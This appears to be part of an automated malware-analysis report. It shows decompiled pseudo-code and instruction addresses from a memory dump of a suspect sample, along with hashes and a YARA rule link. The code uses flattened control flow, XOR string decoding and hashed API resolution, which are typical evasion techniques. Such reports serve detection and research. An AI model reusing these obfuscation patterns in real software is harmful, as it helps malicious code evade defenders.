									_t113 =  ==  ? 0x5fc968a1 : 0xa88bcdf0;
								}
							}
							continue;
						}
					}
					if(_t113 > 0x2511a07b) {
						if(_t113 > 0x4c47a78d) {
							if(_t113 == 0x4c47a78e) {
								r13d = 0;
								r8d = 0x847fc36c;
								r9d = 0x20c;
								E012DFAD7(0xb, _t213, _t235, _t246);
								_t246 =  *0x12e5018;
								 *_t235();
								_t113 = 0xb79bb1e2;
							} else {
								if(_t113 == 0x5fc968a1) {
									_t213 = _v212;
									r8d = 0x13a2df68;
									r9d = 0x210;
									E012DFAD7(0xb, _t213, _t235, _t246);
									r8d = _t213;
									r9d = 0;
									 *_t235();
									r8d = 0xc1613d9c;
									r9d = 0x20f;
									E012DFAD7(0xb, _t213, _t235, _v208);
									 *_t235();
									_t246 = _v200;
									E012DCC2E(_t235, _t246);
									_t113 =  ==  ? 0xcb08a099 : 0x2511a07c;
									r15b = 1;
								}
							}
						} else {
							if(_t113 == 0x2511a07c) {
								_t246 = _v192;
								E012DCC2E(_t235, _t246);
								_v212 = 0;
								_t113 = 0xcb08a099;
								r15d = 0;
							} else {
								if(_t113 == 0x34edd2d1) {
									_t113 = 0x94d6590c;
									_t157 = r14d;
								}
							}
						}
						goto L4;
					}
					if(_t113 > 0x1607854e) {
						if(_t113 == 0x1607854f) {
							_t157 = 0;
							r8d = 0x847fc36c;
							r9d = 0x20c;
							E012DFAD7(0xb, _t213, _t235, _t246);
							 *_t235();
							_t246 = _v200;
							E012DCC2E(_t235, _t246);
							_t113 = 0x94d6590c;
							goto L4;
						}
						if(_t113 != 0x187fe5c7) {
							goto L4;
						}
						E012DCDB9(_v180, _t235);
						_v200 = _t235;
						_v128 =  &_v212;
						_t235 = _v128;
						_v212 = 0;
						_v176 = r12b;
						_v172 = 0x3485e1c4;
						_v168 = 0x348ce1ff;
						_v164 = 0x348de1c8;
						_v160 = 0x3481e1eb;
						_v156 = 0x3490e1ff;
						_v152 = 0x3481e1c0;
						_v148 = 0x3483e1e2;
						_v144 = 0x348ce1f8;
						_v140 = 0x34e4e18c;
						if(_v176 != r12b) {
							L31:
							r8d = 0x5a9dfacd;
							r9d = 0x20b;
							E012DFAD7(0xb, _t213, _t235, _t246);
							_v248 =  &_v184;
							_v240 = 0;
							_t246 =  *0x12e5018;
							r9d = 4;
							 *_t235();
							_t113 =  ==  ? 0xe1215c05 : 0x1607854f;
							goto L4;
						}
						do {
							 *(_t278 + 0x68 + _t235 * 4) = ( *(_t278 + 0x68 + _t235 * 4) & 0x1a12b592 |  !( *(_t278 + 0x68 + _t235 * 4)) & 0xe5ed4a6d) ^ 0xd109abe1;
							_t246 = _t246 + 1;
							_t235 = _t235 + 1;
						} while (_t235 != 0xa);
						goto L31;
					}
					if(_t113 == 0xe4c602b) {
						_t113 =  ==  ? 0x1484192b : 0x8b8b8d3a;
						goto L4;
					}
					if(_t113 != 0x1484192b) {
						goto L4;
					}
					_v176 = r12b;
					_v172 = 0x4a74bdb;
					_v168 = 0x4a04bfe;
					_v164 = 0x4b14bf7;
					_v160 = 0x4a04bd8;
					_v156 = 0x4a24bfa;
					_v152 = 0x4ad4be0;
					_v148 = 0x4c54b94;
					if(_v176 != r12b) {
						L12:
						r8d = 0x5a9dfacd;
						r9d = 0x20b;
						E012DFAD7(0xb, _t213, _t235, _t246);
						_v248 =  &_v184;
						_v240 = 0;
						_t246 =  *0x12e5018;
						r9d = 4;
						 *_t235();
						_t113 =  ==  ? 0x187fe5c7 : 0x4c47a78e;
						r12d = 0;
						goto L4;
					} else {
						do {
							 *(_t278 + 0x68 + _t235 * 4) = ( *(_t278 + 0x68 + _t235 * 4) & 0x36664ace |  !( *(_t278 + 0x68 + _t235 * 4)) & 0xc999b531) ^ 0xcd5cfea5;
							_t246 = _t246 + 1;
							_t235 = _t235 + 1;
						} while (_t235 != 8);
						goto L12;
					}
				} else {
					do {
						 *(_t278 + 0x6c + _t235 * 4) = ( *(_t278 + 0x6c + _t235 * 4) & 0x93cc9ea6 |  !( *(_t278 + 0x6c + _t235 * 4)) & 0x6c336159) ^ 0x5eca4d6c;
						_t235 = _t235 + 1;
					} while (_t235 != 4);
					goto L3;
				}
			}










































                                                                                                                                                        0x012dd57b
                                                                                                                                                        0x012dd58e
                                                                                                                                                        0x012dd596
                                                                                                                                                        0x012dd59e
                                                                                                                                                        0x012dd5a5
                                                                                                                                                        0x012dd5ad
                                                                                                                                                        0x012dd5b2
                                                                                                                                                        0x012dd5c2
                                                                                                                                                        0x012dd5c5
                                                                                                                                                        0x012dd5c8
                                                                                                                                                        0x012dd5cd
                                                                                                                                                        0x012dd5dd
                                                                                                                                                        0x012dd5e0
                                                                                                                                                        0x012dd5e5
                                                                                                                                                        0x012dd5ed
                                                                                                                                                        0x012dd5f5
                                                                                                                                                        0x012dd5fc
                                                                                                                                                        0x012dd601
                                                                                                                                                        0x012dd605
                                                                                                                                                        0x012dd60b
                                                                                                                                                        0x012dd612
                                                                                                                                                        0x012dd619
                                                                                                                                                        0x012dd624
                                                                                                                                                        0x012dd651
                                                                                                                                                        0x012dd658
                                                                                                                                                        0x012dd65e
                                                                                                                                                        0x012dd664
                                                                                                                                                        0x012dd673
                                                                                                                                                        0x012dd676
                                                                                                                                                        0x012dd67b
                                                                                                                                                        0x012dd68c
                                                                                                                                                        0x012dd68f
                                                                                                                                                        0x012dd697
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd69c
                                                                                                                                                        0x012dd7b7
                                                                                                                                                        0x012dd85a
                                                                                                                                                        0x012ddaf6
                                                                                                                                                        0x012ddc2b
                                                                                                                                                        0x012ddc31
                                                                                                                                                        0x012ddc37
                                                                                                                                                        0x012ddc41
                                                                                                                                                        0x012ddc43
                                                                                                                                                        0x012ddc50
                                                                                                                                                        0x012ddc57
                                                                                                                                                        0x012ddc5f
                                                                                                                                                        0x012ddc69
                                                                                                                                                        0x012ddc6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012ddc6d
                                                                                                                                                        0x012ddb01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012ddc8f
                                                                                                                                                        0x012ddca9
                                                                                                                                                        0x012ddca9
                                                                                                                                                        0x012dd865
                                                                                                                                                        0x012ddb59
                                                                                                                                                        0x012ddb5c
                                                                                                                                                        0x012ddb63
                                                                                                                                                        0x012ddb69
                                                                                                                                                        0x012ddb6f
                                                                                                                                                        0x012ddb79
                                                                                                                                                        0x012ddb80
                                                                                                                                                        0x012ddb85
                                                                                                                                                        0x012ddb8a
                                                                                                                                                        0x012ddb8f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012ddb8f
                                                                                                                                                        0x012dd870
                                                                                                                                                        0x012dd87a
                                                                                                                                                        0x012dd87f
                                                                                                                                                        0x012dd884
                                                                                                                                                        0x012dd89b
                                                                                                                                                        0x012dd8a1
                                                                                                                                                        0x012dd8a7
                                                                                                                                                        0x012dd8ac
                                                                                                                                                        0x012dd8b1
                                                                                                                                                        0x012dd8b6
                                                                                                                                                        0x012dd8bf
                                                                                                                                                        0x012dd8ca
                                                                                                                                                        0x012dd8cd
                                                                                                                                                        0x012dd8db
                                                                                                                                                        0x012dd8db
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd870
                                                                                                                                                        0x012dd7c2
                                                                                                                                                        0x012dda1f
                                                                                                                                                        0x012ddbd5
                                                                                                                                                        0x012ddbdd
                                                                                                                                                        0x012ddbe2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012ddbe2
                                                                                                                                                        0x012dda2a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dda35
                                                                                                                                                        0x012dda3f
                                                                                                                                                        0x012dda45
                                                                                                                                                        0x012dda4b
                                                                                                                                                        0x012dda50
                                                                                                                                                        0x012dda53
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd7c8
                                                                                                                                                        0x012dd7cd
                                                                                                                                                        0x012ddb26
                                                                                                                                                        0x012ddb2b
                                                                                                                                                        0x012dd7d3
                                                                                                                                                        0x012dd7d8
                                                                                                                                                        0x012dd7ea
                                                                                                                                                        0x012dd7f0
                                                                                                                                                        0x012dd7f6
                                                                                                                                                        0x012dd7fb
                                                                                                                                                        0x012dd806
                                                                                                                                                        0x012dd80e
                                                                                                                                                        0x012dd811
                                                                                                                                                        0x012dd81f
                                                                                                                                                        0x012dd81f
                                                                                                                                                        0x012dd7d8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd7cd
                                                                                                                                                        0x012dd7c2
                                                                                                                                                        0x012dd6ac
                                                                                                                                                        0x012dd82c
                                                                                                                                                        0x012dda66
                                                                                                                                                        0x012ddbf1
                                                                                                                                                        0x012ddbfb
                                                                                                                                                        0x012ddc01
                                                                                                                                                        0x012ddc07
                                                                                                                                                        0x012ddc0c
                                                                                                                                                        0x012ddc11
                                                                                                                                                        0x012ddc13
                                                                                                                                                        0x012dda6c
                                                                                                                                                        0x012dda71
                                                                                                                                                        0x012dda77
                                                                                                                                                        0x012dda8c
                                                                                                                                                        0x012dda92
                                                                                                                                                        0x012dda98
                                                                                                                                                        0x012ddaa3
                                                                                                                                                        0x012ddaa6
                                                                                                                                                        0x012ddaa9
                                                                                                                                                        0x012ddaba
                                                                                                                                                        0x012ddac0
                                                                                                                                                        0x012ddac6
                                                                                                                                                        0x012ddace
                                                                                                                                                        0x012ddad0
                                                                                                                                                        0x012ddad5
                                                                                                                                                        0x012ddae6
                                                                                                                                                        0x012ddae9
                                                                                                                                                        0x012ddae9
                                                                                                                                                        0x012dda71
                                                                                                                                                        0x012dd832
                                                                                                                                                        0x012dd837
                                                                                                                                                        0x012ddb33
                                                                                                                                                        0x012ddb38
                                                                                                                                                        0x012ddb3d
                                                                                                                                                        0x012ddb45
                                                                                                                                                        0x012ddb4a
                                                                                                                                                        0x012dd83d
                                                                                                                                                        0x012dd842
                                                                                                                                                        0x012dd848
                                                                                                                                                        0x012dd84d
                                                                                                                                                        0x012dd84d
                                                                                                                                                        0x012dd842
                                                                                                                                                        0x012dd837
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd82c
                                                                                                                                                        0x012dd6b7
                                                                                                                                                        0x012dd8e8
                                                                                                                                                        0x012ddba0
                                                                                                                                                        0x012ddba9
                                                                                                                                                        0x012ddbaf
                                                                                                                                                        0x012ddbb5
                                                                                                                                                        0x012ddbbf
                                                                                                                                                        0x012ddbc1
                                                                                                                                                        0x012ddbc6
                                                                                                                                                        0x012ddbcb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012ddbcb
                                                                                                                                                        0x012dd8f3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd8fd
                                                                                                                                                        0x012dd902
                                                                                                                                                        0x012dd90c
                                                                                                                                                        0x012dd914
                                                                                                                                                        0x012dd91c
                                                                                                                                                        0x012dd924
                                                                                                                                                        0x012dd929
                                                                                                                                                        0x012dd931
                                                                                                                                                        0x012dd939
                                                                                                                                                        0x012dd941
                                                                                                                                                        0x012dd949
                                                                                                                                                        0x012dd951
                                                                                                                                                        0x012dd95c
                                                                                                                                                        0x012dd967
                                                                                                                                                        0x012dd972
                                                                                                                                                        0x012dd982
                                                                                                                                                        0x012dd9b7
                                                                                                                                                        0x012dd9cd
                                                                                                                                                        0x012dd9d3
                                                                                                                                                        0x012dd9d9
                                                                                                                                                        0x012dd9e3
                                                                                                                                                        0x012dd9e8
                                                                                                                                                        0x012dd9f0
                                                                                                                                                        0x012dd9fe
                                                                                                                                                        0x012dda04
                                                                                                                                                        0x012dda12
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dda12
                                                                                                                                                        0x012dd98b
                                                                                                                                                        0x012dd9a7
                                                                                                                                                        0x012dd9ab
                                                                                                                                                        0x012dd9ae
                                                                                                                                                        0x012dd9b1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd98b
                                                                                                                                                        0x012dd6c2
                                                                                                                                                        0x012ddb1e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012ddb1e
                                                                                                                                                        0x012dd6cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd6cf
                                                                                                                                                        0x012dd6d4
                                                                                                                                                        0x012dd6dc
                                                                                                                                                        0x012dd6e4
                                                                                                                                                        0x012dd6ec
                                                                                                                                                        0x012dd6f4
                                                                                                                                                        0x012dd6fc
                                                                                                                                                        0x012dd707
                                                                                                                                                        0x012dd717
                                                                                                                                                        0x012dd74c
                                                                                                                                                        0x012dd762
                                                                                                                                                        0x012dd768
                                                                                                                                                        0x012dd76e
                                                                                                                                                        0x012dd778
                                                                                                                                                        0x012dd77d
                                                                                                                                                        0x012dd785
                                                                                                                                                        0x012dd793
                                                                                                                                                        0x012dd799
                                                                                                                                                        0x012dd7a7
                                                                                                                                                        0x012dd7aa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd719
                                                                                                                                                        0x012dd720
                                                                                                                                                        0x012dd73c
                                                                                                                                                        0x012dd740
                                                                                                                                                        0x012dd743
                                                                                                                                                        0x012dd746
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd720
                                                                                                                                                        0x012dd626
                                                                                                                                                        0x012dd628
                                                                                                                                                        0x012dd644
                                                                                                                                                        0x012dd648
                                                                                                                                                        0x012dd64b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012dd628

                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 95eb8b67b21c0a35bec4c4dd9b5787004a605eea7103d300181fbade668e2397
                                                                                                                                                        • Instruction ID: b986e4486fa8301b735ae73a7fb516814ea59db8f311aa69331333e417368a72
                                                                                                                                                        • Opcode Fuzzy Hash: 95eb8b67b21c0a35bec4c4dd9b5787004a605eea7103d300181fbade668e2397
                                                                                                                                                        • Instruction Fuzzy Hash: B6E1E576328B848AD7348B59F95072FBB60E7D9B84F14441ADB8E97B98DF38C4418B41
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D9F06, Relevance: .3, Instructions: 308COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                        			E012D9F06(void* __edx, void* __esi, signed long long __rcx, void* __rdx, void* __r8, void* __r11) {
				void* _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _v144;
				signed long long _v152;
				long long _v160;
				long long _v168;
				void* _v176;
				void* _v184;
				signed long long _v192;
				signed long long _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				long long _v224;
				long long _v232;
				void* _v240;
				void* _v248;
				intOrPtr _v252;
				signed int _t105;
				intOrPtr _t113;
				void* _t138;
				void* _t141;
				void* _t147;
				signed int _t148;
				signed int _t171;
				intOrPtr _t174;
				void* _t175;
				signed long long _t198;
				long long* _t202;
				signed long long _t207;
				signed long long _t226;
				void* _t229;
				void* _t230;
				void* _t232;
				char* _t234;

				_t232 = __r11;
				_t230 = __r8;
				_t207 = __rcx;
				_t175 = __esi;
				_t229 =  &_v232;
				_t226 = __rcx;
				_v72 = __rcx + 0xa7c;
				_v80 = __rcx + 0x268;
				_v88 = __rcx + 0x3c4;
				_v96 = __rcx + 0x260;
				_v160 = __rcx + 0xb84;
				_v104 = __rcx + 0xab8;
				_v112 = __rcx + 0x650;
				_v168 = __rcx + 0xba4;
				_v120 = __rcx + 0x280;
				_v128 = __rcx + 0x5d2;
				r13d = 0xa4ea36c8;
				r13d =  ==  ? 0x2f4f7505 : r13d;
				_v136 = __rcx + 0x638;
				_v144 = __rcx + 0x294;
				_t234 = __rcx + 0x668;
				_t198 = __rcx + 0x2bc;
				_v152 = _t198;
				_t105 = 0xfe2a537f;
				_t174 = 0;
				_t147 = 0xd179479f;
				while(1) {
					L1:
					_t148 = _t105;
					if(_t105 > 0xca07f7a4) {
						break;
					}
					if(_t148 <= 0xa4ea36c7) {
						if(_t148 == 0x8214d9d3) {
							_t207 = _v72;
							r8d = 0x232d;
							E012E020E(_t198, _t207, 0x12e4038, _t230, _t231);
							_t105 = 0x6873718e;
							continue;
						}
						if(_t148 == 0x865c1933) {
							_t198 = _v232;
							_t105 =  ==  ? 0xacea65a6 : 0xaf2d268;
							continue;
						}
						_t105 = _t148;
						if(_t148 != 0x9e0aa56b) {
							continue;
						}
						_t198 = _v176;
						 *_t198 = 0x10;
						_v224 = dil;
						_v220 = 0x1fdaee78;
						_v216 = 0x1feaee62;
						_v212 = 0x1fc6ee63;
						_v208 = 0x1fd1ee73;
						_v204 = 0x1fb5ee16;
						if(_v224 != dil) {
							L18:
							_t207 = _v240;
							_t225 =  &_v220;
							r8d = 0x10;
							E012DC96E(_t105, _t207,  &_v220);
							_t105 = 0xca07f7a5;
							continue;
						} else {
							_t105 = 1;
							do {
								_t171 =  *(_t229 + 0x48 + _t198 * 4);
								_t176 =  !_t171 & 0x1097fe02;
								_t170 = (_t171 & 0xef6801fd |  !_t171 & 0x1097fe02) ^ 0x0f221014;
								 *(_t229 + 0x48 + _t198 * 4) = (_t171 & 0xef6801fd |  !_t171 & 0x1097fe02) ^ 0x0f221014;
								_t207 = _t207 + 1;
								_t198 = _t198 + 1;
							} while (_t198 != 6);
							goto L18;
						}
					} else {
						if(_t148 > 0xb4c0f81a) {
							if(_t148 == 0xb4c0f81b) {
								_t198 = _v152;
								_v192 = _t198;
								r8d = 0x328b7e5;
								r9d = 0x57;
								E012DFAD7(1, _t175, _t198, _t207);
								_t207 = _v200 + 0x38;
								_t147 = 0xd179479f;
								_t174 = 0;
								r8d = 0x104;
								 *_t198();
								_t105 =  ==  ? 0xcaaa26ea : 0x6873718e;
							} else {
								_t105 = _t148;
								if(_t148 == 0xbb03bdd5) {
									_t105 =  ==  ? _t147 : 0x865c1933;
								}
							}
						} else {
							if(_t148 == 0xa4ea36c8) {
								 *((intOrPtr*)(_t226 + 0xaa4)) = E012D4554(_t198, _t226, _t232);
								E012DC450(_t198, _v80);
								 *((char*)(_t226 + 0xaa8)) =  *((intOrPtr*)(_t226 + 0x268));
								 *((char*)(_t226 + 0xaa9)) =  *((intOrPtr*)(_t226 + 0x26a));
								 *((char*)(_t226 + 0xaaa)) =  *((intOrPtr*)(_t226 + 0x26c));
								 *((char*)(_t226 + 0xaab)) =  *((intOrPtr*)(_t226 + 0x26e));
								 *((char*)(_t226 + 0xaac)) =  *((intOrPtr*)(_t226 + 0x272));
								 *((char*)(_t226 + 0xaad)) =  *((intOrPtr*)(_t226 + 0x274));
								 *((char*)(_t226 + 0xaae)) =  *((intOrPtr*)(_t226 + 0x278));
								 *((char*)(_t226 + 0xaaf)) =  *((intOrPtr*)(_t226 + 0x27a));
								 *((intOrPtr*)(_t226 + 0x264)) = 8;
								_v184 = _v88;
								E012D4EBD( *_v184, _v184, _t226);
								_v248 = _v96;
								_t202 = _v248;
								 *_t202 = dil;
								r8d = 0x6efba682;
								r9d = 0x84;
								E012DFAD7(1, _t175, _t202, _t226);
								_t138 =  *_t202();
								_t74 = _t202 + 1; // 0x1
								r8d = _t74;
								E012DC96E(_t138, _v112, _v160);
								r8d = 0x6efba682;
								r9d = 0x84;
								E012DFAD7(1, _t175, _t202, _v112);
								_t141 =  *_t202();
								_t77 = _t202 + 1; // 0x1
								r8d = _t77;
								E012DC96E(_t141, _v120, _v168);
								_v240 = _v128;
								r8d = 0x50;
								E012DC8BC(0, _v128, _v240, _t230, _t232);
								_v176 = _v136;
								 *_v176 = 0x50;
								 *((intOrPtr*)(_t226 + 0x664)) = 0x28;
								_v232 = _v144;
								r8d = 0x28;
								E012DC8BC(0, _v144, _v232, _t230, _t232);
								_t207 = _t226;
								_t170 = 1;
								E012D7B43(1, _v144, _t207);
								_t198 = _v240;
								_t105 =  ==  ? 0x9e0aa56b : 0xca07f7a5;
							} else {
								_t105 = _t148;
								if(_t148 == 0xacea65a6) {
									_t198 = _v248;
									 *_t198 = 0;
									_t105 = 0x8214d9d3;
								}
							}
						}
						continue;
					}
				}
				if(_t148 <= 0xfe2a537e) {
					if(_t148 == 0xca07f7a5) {
						_t207 = _t226;
						E012D7B43(2, _t198, _t207);
						_t198 = _v184;
						_v252 =  *_t198;
						_t105 =  ==  ? _t147 : 0xbb03bdd5;
					} else {
						if(_t148 == 0xcaaa26ea) {
							r8d = 0xce1f1c4e;
							r9d = 0xc5;
							E012DFAD7(1, _t175, _t198, _t207);
							 *_t198();
							r8d = 0x6efba682;
							r9d = 0x84;
							E012DFAD7(1, _t175, _t198, _t207);
							_t113 =  *_t198();
							_t207 = _v192;
							_t225 = _t234;
							r8d = _t113;
							E012DC96E(_t113, _t207, _t234);
							_t105 = 0x6873718e;
						} else {
							_t105 = _t148;
							if(_t148 == 0xd179479f) {
								E012D5CD8(_t170, _t175, _t198, _t226);
								_t231 = _v232;
								_t207 = _t226;
								_t170 = 0xffffffff;
								r8d = 0;
								E012D6537(0xffffffff, _t207, _t225, _v232, _t232);
								_t105 = 0x865c1933;
							}
						}
					}
					goto L1;
				}
				if(_t148 > 0x2f4f7504) {
					if(_t148 == 0x2f4f7505) {
						_t198 = _v104;
						_v200 = _t198;
						E012D3EB5(_t174, _v200);
						_t207 = _t226;
						E012D96F5(_t147, _t174, _t176, _t207);
						_t105 =  ==  ? 0x6873718e : 0xb4c0f81b;
						goto L1;
					}
					_t105 = _t148;
					if(_t148 != 0x6873718e) {
						goto L1;
					}
					return _t105;
				} else {
					_t105 = r13d;
					if(_t148 != 0xfe2a537f) {
						_t105 = _t148;
						if(_t148 == 0xaf2d268) {
							_t198 = _v248;
							 *_t198 = 1;
							_t105 = 0x8214d9d3;
						}
					}
					goto L1;
				}
			}















































                                                                                                                                                        0x012d9f06
                                                                                                                                                        0x012d9f06
                                                                                                                                                        0x012d9f06
                                                                                                                                                        0x012d9f06
                                                                                                                                                        0x012d9f12
                                                                                                                                                        0x012d9f19
                                                                                                                                                        0x012d9f23
                                                                                                                                                        0x012d9f32
                                                                                                                                                        0x012d9f41
                                                                                                                                                        0x012d9f50
                                                                                                                                                        0x012d9f5f
                                                                                                                                                        0x012d9f6e
                                                                                                                                                        0x012d9f7d
                                                                                                                                                        0x012d9f8c
                                                                                                                                                        0x012d9f9b
                                                                                                                                                        0x012d9faa
                                                                                                                                                        0x012d9fba
                                                                                                                                                        0x012d9fc0
                                                                                                                                                        0x012d9fcb
                                                                                                                                                        0x012d9fda
                                                                                                                                                        0x012d9fe2
                                                                                                                                                        0x012d9fe9
                                                                                                                                                        0x012d9ff0
                                                                                                                                                        0x012d9ff8
                                                                                                                                                        0x012d9ffd
                                                                                                                                                        0x012d9fff
                                                                                                                                                        0x012da004
                                                                                                                                                        0x012da004
                                                                                                                                                        0x012da004
                                                                                                                                                        0x012da00b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da013
                                                                                                                                                        0x012da088
                                                                                                                                                        0x012da380
                                                                                                                                                        0x012da38f
                                                                                                                                                        0x012da395
                                                                                                                                                        0x012da39a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da39a
                                                                                                                                                        0x012da094
                                                                                                                                                        0x012da3a4
                                                                                                                                                        0x012da3b6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da3b6
                                                                                                                                                        0x012da09a
                                                                                                                                                        0x012da0a2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da0a8
                                                                                                                                                        0x012da0ad
                                                                                                                                                        0x012da0b3
                                                                                                                                                        0x012da0b8
                                                                                                                                                        0x012da0c0
                                                                                                                                                        0x012da0c8
                                                                                                                                                        0x012da0d0
                                                                                                                                                        0x012da0d8
                                                                                                                                                        0x012da0e5
                                                                                                                                                        0x012da11a
                                                                                                                                                        0x012da11a
                                                                                                                                                        0x012da11f
                                                                                                                                                        0x012da124
                                                                                                                                                        0x012da12a
                                                                                                                                                        0x012da12f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da0e7
                                                                                                                                                        0x012da0e7
                                                                                                                                                        0x012da0ee
                                                                                                                                                        0x012da0ee
                                                                                                                                                        0x012da0f6
                                                                                                                                                        0x012da104
                                                                                                                                                        0x012da10a
                                                                                                                                                        0x012da10e
                                                                                                                                                        0x012da111
                                                                                                                                                        0x012da114
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da0ee
                                                                                                                                                        0x012da015
                                                                                                                                                        0x012da01b
                                                                                                                                                        0x012da18c
                                                                                                                                                        0x012da43b
                                                                                                                                                        0x012da443
                                                                                                                                                        0x012da45d
                                                                                                                                                        0x012da463
                                                                                                                                                        0x012da469
                                                                                                                                                        0x012da46e
                                                                                                                                                        0x012da471
                                                                                                                                                        0x012da476
                                                                                                                                                        0x012da47b
                                                                                                                                                        0x012da481
                                                                                                                                                        0x012da490
                                                                                                                                                        0x012da192
                                                                                                                                                        0x012da192
                                                                                                                                                        0x012da19a
                                                                                                                                                        0x012da1aa
                                                                                                                                                        0x012da1aa
                                                                                                                                                        0x012da19a
                                                                                                                                                        0x012da021
                                                                                                                                                        0x012da027
                                                                                                                                                        0x012da1d9
                                                                                                                                                        0x012da1e7
                                                                                                                                                        0x012da1f8
                                                                                                                                                        0x012da1fe
                                                                                                                                                        0x012da20a
                                                                                                                                                        0x012da216
                                                                                                                                                        0x012da222
                                                                                                                                                        0x012da22e
                                                                                                                                                        0x012da23a
                                                                                                                                                        0x012da246
                                                                                                                                                        0x012da24c
                                                                                                                                                        0x012da25e
                                                                                                                                                        0x012da26d
                                                                                                                                                        0x012da27a
                                                                                                                                                        0x012da27f
                                                                                                                                                        0x012da284
                                                                                                                                                        0x012da28e
                                                                                                                                                        0x012da294
                                                                                                                                                        0x012da29a
                                                                                                                                                        0x012da2aa
                                                                                                                                                        0x012da2ac
                                                                                                                                                        0x012da2ac
                                                                                                                                                        0x012da2bb
                                                                                                                                                        0x012da2c7
                                                                                                                                                        0x012da2cd
                                                                                                                                                        0x012da2d3
                                                                                                                                                        0x012da2e3
                                                                                                                                                        0x012da2e5
                                                                                                                                                        0x012da2e5
                                                                                                                                                        0x012da2f4
                                                                                                                                                        0x012da301
                                                                                                                                                        0x012da30b
                                                                                                                                                        0x012da313
                                                                                                                                                        0x012da320
                                                                                                                                                        0x012da32a
                                                                                                                                                        0x012da330
                                                                                                                                                        0x012da342
                                                                                                                                                        0x012da34c
                                                                                                                                                        0x012da354
                                                                                                                                                        0x012da359
                                                                                                                                                        0x012da35c
                                                                                                                                                        0x012da361
                                                                                                                                                        0x012da366
                                                                                                                                                        0x012da378
                                                                                                                                                        0x012da02d
                                                                                                                                                        0x012da02d
                                                                                                                                                        0x012da035
                                                                                                                                                        0x012da037
                                                                                                                                                        0x012da03c
                                                                                                                                                        0x012da03f
                                                                                                                                                        0x012da03f
                                                                                                                                                        0x012da035
                                                                                                                                                        0x012da027
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da01b
                                                                                                                                                        0x012da013
                                                                                                                                                        0x012da04c
                                                                                                                                                        0x012da13f
                                                                                                                                                        0x012da3be
                                                                                                                                                        0x012da3c6
                                                                                                                                                        0x012da3cb
                                                                                                                                                        0x012da3d2
                                                                                                                                                        0x012da3e2
                                                                                                                                                        0x012da145
                                                                                                                                                        0x012da14b
                                                                                                                                                        0x012da3f1
                                                                                                                                                        0x012da3f7
                                                                                                                                                        0x012da3fd
                                                                                                                                                        0x012da402
                                                                                                                                                        0x012da40b
                                                                                                                                                        0x012da411
                                                                                                                                                        0x012da417
                                                                                                                                                        0x012da41f
                                                                                                                                                        0x012da421
                                                                                                                                                        0x012da426
                                                                                                                                                        0x012da429
                                                                                                                                                        0x012da42c
                                                                                                                                                        0x012da431
                                                                                                                                                        0x012da151
                                                                                                                                                        0x012da151
                                                                                                                                                        0x012da159
                                                                                                                                                        0x012da162
                                                                                                                                                        0x012da167
                                                                                                                                                        0x012da16c
                                                                                                                                                        0x012da16f
                                                                                                                                                        0x012da174
                                                                                                                                                        0x012da177
                                                                                                                                                        0x012da17c
                                                                                                                                                        0x012da17c
                                                                                                                                                        0x012da159
                                                                                                                                                        0x012da14b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da13f
                                                                                                                                                        0x012da058
                                                                                                                                                        0x012da1b8
                                                                                                                                                        0x012da498
                                                                                                                                                        0x012da4a0
                                                                                                                                                        0x012da4aa
                                                                                                                                                        0x012da4af
                                                                                                                                                        0x012da4b2
                                                                                                                                                        0x012da4c8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da4c8
                                                                                                                                                        0x012da1be
                                                                                                                                                        0x012da1c6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012da05e
                                                                                                                                                        0x012da05e
                                                                                                                                                        0x012da067
                                                                                                                                                        0x012da069
                                                                                                                                                        0x012da071
                                                                                                                                                        0x012da073
                                                                                                                                                        0x012da078
                                                                                                                                                        0x012da07b
                                                                                                                                                        0x012da07b
                                                                                                                                                        0x012da071
